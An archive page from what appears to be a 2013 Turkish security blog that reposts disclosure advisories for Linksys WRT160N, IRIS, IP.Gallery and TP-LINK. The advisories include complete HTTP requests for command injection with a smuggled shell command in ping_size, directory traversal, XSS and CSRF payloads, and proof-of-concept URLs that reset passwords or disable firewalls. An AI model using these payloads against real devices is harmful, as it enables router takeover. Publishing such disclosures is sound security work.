Archive for 11 Şubat 2013

Linksys WRT160N – Multiple Vulnerabilities

Linksys WRT160N – Multiple XSS Post açıkları bulunmuş olup açık hakkında geniş kapsamlı açıklamalar şu şekildedir.

Device Name: Linksys WRT160Nv2
Vendor: Linksys/Cisco

============ Device Description: ============ 

Best For: Delivers plenty of speed and coverage, so large groups of users can go online, transfer large files, print, and stream stored media

Features:
    * Fast Wireless-N connectivity frees you to do more around your home
    * Easy to set up and use, industrial-strength security protection
    * Great for larger homes with many users

Source: http://homestore.cisco.com/en-us/routers/Linksys-WRT160N-Wireless-N-Router-Front-Page_stcVVproductId53934616VVcatId552009VVviewprod.htm

============  Vulnerable Firmware Releases: ============ 

Firmware Version: v2.0.03 build 009

============ Shodan Torks ============ 

Shodan Search: WRT160Nv2
	=>  4072 results

============ Vulnerability Overview: ============ 

* OS Command Injection

	=>  parameter: ping_size

The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to upload and execute a backdoor to compromise the device.
You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.

POST /apply.cgi HTTP/1.1
Host: 192.168.178.233
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.233/Diagnostics.asp
Authorization: Basic XXXX=
Content-Type: application/x-www-form-urlencoded
Content-Length: 181
Connection: close

submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=|ping 192.168.178.101|&ping_times=5&traceroute_ip=

Change the request methode from HTTP Post to HTTP GET makes the exploitation easier (CSRF):

http://Target-IP/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=|ping 192.168.178.100|&ping_times=5&traceroute_ip=

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/WRT160Nv2-OS-Command-Injection.png

* Directory traversal:

	=>  parameter: next_page
	
Access local files of the device. You need to be authenticated or you have to find other methods for accessing the device.

Request:
POST /apply.cgi HTTP/1.1
Host: 192.168.178.233
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.233/Wireless_Basic.asp
Authorization: Basic XXXXX=
Content-Type: application/x-www-form-urlencoded
Content-Length: 77

submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version

Response:
HTTP/1.1 200 Ok
Server: httpd
Date: Thu, 01 Jan 1970 02:53:16 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/html
Connection: close

Linux version 2.4.30 (tcy@cybertan) (gcc version 3.3.6) #9 Fri Aug 21 11:23:36 CST 2009

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/WRT160Nv2-directory-traversal.png

* XSS

Injecting scripts into the parameter ddns_enable, need_reboot, ping_ip and ping_size reveals that these parameters are not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

	=>  Setup =>  DDNS
	=>  parameter ddns_enable

POST /apply.cgi HTTP/1.1
Host: 192.168.178.233
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.233/DDNS.asp
Authorization: Basic XXXXX=
Content-Type: application/x-www-form-urlencoded
Content-Length: 122

submit_button=DDNS&action=&change_action=gozila_cgi&submit_type=&wait_time=6&ddns_changed=&ddns_enable=';alert('pwnd')//

	=>  Setup =>  Basic Setup
	=>  parameter need_reboot

POST /apply.cgi HTTP/1.1
Host: 192.168.178.233
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.233/index.asp
Authorization: Basic XXXX=
Content-Type: application/x-www-form-urlencoded
Content-Length: 568

pptp_dhcp=0&submit_button=index&change_action=&submit_type=&action=Apply&now_proto=pppoe&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=';alert('pwnd')//&dhcp_check=&lan_netmask_0=&lan_netmask_1=&lan_netmask_2=&lan_netmask_3=&timer_interval=30&language=EN&wan_proto=pppoe&ppp_username=pwnd&ppp_passwd=d6nw5v1x2pc7st9m&ppp_service=pwnd&ppp_demand=0&ppp_redialperiod=30&wan_hostname=pwnd&wan_domain=pwnd&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=233&lan_netmask=255.255.255.0&lan_proto=static&time_zone=-08 1 1&_daylight_time=1

	=>  Administration =>  Diagnostics
	=>  parameter ping_ip and ping_size
	
POST /apply.cgi HTTP/1.1
Host: 192.168.178.233
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.233/Diagnostics.asp
Authorization: Basic XXXX=
Content-Type: application/x-www-form-urlencoded
Content-Length: 201

submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&#39;>  <script> alert(2) </script> &ping_size=32&#39;>  <script> alert(1) </script> &ping_times=5&traceroute_ip=

It is possible that there are much more XSS Vulnerabilities in this device. I have stopped testing here ... so feel free to check more parameters for input validation problems and XSS vulnerabilities.

* For changing the current password there is no request of the current password

	=>  parameter: http_passwd and http_passwdConfirm

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.

POST /apply.cgi HTTP/1.1
Host: 192.168.178.233
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.233/Management.asp
Authorization: Basic XXXX=
Content-Type: application/x-www-form-urlencoded
Content-Length: 250

submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&wait_time=4&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

* CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management:

http:// <IP> /apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&wait_time=4&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

============ Solution ============

No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de/advisories
Twitter: @s3cur1ty_de

============ Time Line: ============

Dezember 2012 - discovered vulnerability
23.12.2012 - Contacted Linksys and give them detailed vulnerability details
11.02.2013 - public release

===================== Advisory end =====================

IRIS Citations Management Tool (post auth) Remote Command Execution

IRIS Citations Management Tool (post auth) Uzaktan komut çalıştırma açığı bulunmuş olup aşağıdaki url den exploit dosyasını indirip test edebilirsiniz.

Here is a bug that I finally found time to write about 🙂

https://infosecabsurdity.wordpress.com/2013/02/09/iris-citations-management-tool-post-auth-remote-command-execution/

The attached contains my mini framework, exploit and screenshot.

Cheers!

~ aeon

# I Read It Somewhere (IRIS) <= v1.3 (post auth) Remote Command Execution # download: http://ireaditsomewhere.googlecode.com # Notes: # - Found this in my archive, duno how long this has been 0Day for... but I had no use for it obviously. # - Yes! ..the code is disgusting, but does the job # - Sorry if I ripped your code, it worked for me and I dont reinvent wheels so thank you! # ~ aeon (https://infosecabsurdity.wordpress.com/) # # Exploit requirements: # ~~~~~~~~~~~~~~~~~~~~~ # # - A valid account as at least a user # - The target to have outgoing internet connectivity Exploit: http://www.exploit-db.com/sploits/24480.tar.gz [/sourcecode]

IP.Gallery 4.2.x and 5.0.x Persistent XSS Vulnerability

IP.Gallery 4.2.x and 5.0.x Persistent XSS Açığı bulunmuş olup, açığın olupum yeri ve açık hakkında açıklamalar şu şekildedir;

# Exploit Title: IP.Gallery 4.2.x and 5.0.x persistent XSS vulnerability

# Date: 8/2/2013

# Exploit Author: Mohamed Ramadan


# Vendor Homepage: http://www.invisionpower.com/

# Software Link: http://www.invisionpower.com/apps/gallery/

# Version: IP.Gallery 4.2.x and 5.0.x


image title is vulnerable to persistent XSS vulnerability which allow any
normal member to hack any administrator account or any other member account.

we contacted the vendor and reported this issue to them and they fixed it
and released this patch:

http://community.invisionpower.com/topic/379028-ipgallery-42x-and-50x-security-update/


Here is a video demonstrating the attack in action :


https://docs.google.com/file/d/0B_cpjifQmPbZMmxVcEdqU3A1aU0/edit?usp=sharing


and here is another video demonstrating how to bypass httponly cookies :


https://docs.google.com/file/d/0B_cpjifQmPbZemFsbFJDRnVkVTA/edit?usp=sharing


 

TP-LINK Admin Panel Multiple CSRF Vulnerabilities

TP-LINK Admin Panel Multiple CSRF Açığı bulunmuş olup, açığın kullanımı ve açık hakkında açıklamalar şu şekildedir;

Advisory Name: Multiple Cross Site Request Forgery vulnerabilities in
TP-LINK Admin Panel

Internal Cybsec Advisory Id: 2013-0208-Multiple CSRF vulnerabilities in
TP-LINK

Vulnerability Class: Cross Site Request Forgery (CSRF)

Release Date: 02/08/2013

Affected Applications: Firmware v3.13.6 Build 110923 Rel.53137n; other
versions may also be affected.

Affected Platforms: WR2543ND or any running the vulnerable firmware.

Local / Remote:  Remote

Severity: Medium � CVSS: 4.0 (AV:N/AC:L/Au:S/C:N/I:P/A:N)

Researcher: Juan Manuel Garcia

Vendor Status: Acknowedged / Unpatched

Release Mode: User released

Reference to Vulnerability Disclosure Policy:
http://www.cybsec.com/vulnerability_policy.pdf

Vulnerability Description:

Multiple Cross Site Request Forgery vulnerabilities were found in TP-LINK
Admin Panel, because the application allows authorized users to perform
certain actions via HTTP requests without making proper validity checks to
verify the source of the requests. This can be exploited to perform
certain actions with administrative privileges if a logged-in user visits
a malicious web site.

Proof of Concepts:

1)	New Storage Sharing and FTP Server user:
http://server/userRpm/NasUserAdvRpm.htm?nas_admin_pwd=hacker&nas_admin_confirm_pwd=hacker&nas_admin_authority=1&nas_admin_ftp=1&Modify=1&Save=Save

2)	Disable the Router&#39;s Stateful Inspection Firewall:
http://server/userRpm/BasicSecurityRpm.htm?stat=983040&Save=Save

Impact:

An affected user may unintentionally execute actions written by an
attacker. In addition, an attacker may change router settings or gain
unauthorized access
Vendor Response:

2012-10-10 � Vulnerability is identified.
2012-10-11 � Vendor is contacted.
2012-10-12 � Vulnerability details are sent to vendor.
2012-10-17 � Vendor confirms vulnerability and states �This vulnerability
has been escalated to our RD engineer but under current web server
framework it is hard to fix. Our engineer team will modify the web server
framework to fix this. Currently it is under process but will take time�.
2012-10-25 � Cybsec asks the vendor for the planned publication date for
the update.
2012-10-26 � Vendor states �I have no detailed schedule yet�.
2012-12-12 � Cybsec asks if there are any news regarding the solution of
reported vulnerabilities.
2012-12-12 � Vendor states �The fix of this reported vulnerability is not
included in the last firmware upgrade because the web server framework
change is still under development�.
2013-02-01 � Cybsec tells the Vendor that the security advisory will be
published on Wednesday February 6.
2013-02-08 � Having received no reply from TP-Link, vulnerability is
released.

Contact Information:

For more information regarding the vulnerability feel free to contact the
researcher at
jmgarcia  <at>  cybsec  <dot>  com

About CYBSEC S.A. Security Systems

Since 1996, CYBSEC is engaged exclusively in rendering professional
services specialized in Information Security. Their area of services
covers Latin America, Spain and over 250 customers are a proof of their
professional life.

To keep objectivity, CYBSEC S.A. does not represent, neither sell, nor is
associated with other software and/or hardware provider companies.

Our services are strictly focused on Information Security, protecting our
clients from emerging security threats, maintaining their IT deployments
available, safe, and reliable.

Beyond professional services, CYBSEC is continuously researching new
defense and attack techniques and contributing with the security community
with high quality information exchange.

For more information, please visit www.cybsec.com
(c) 2010 - CYBSEC S.A. Security Systems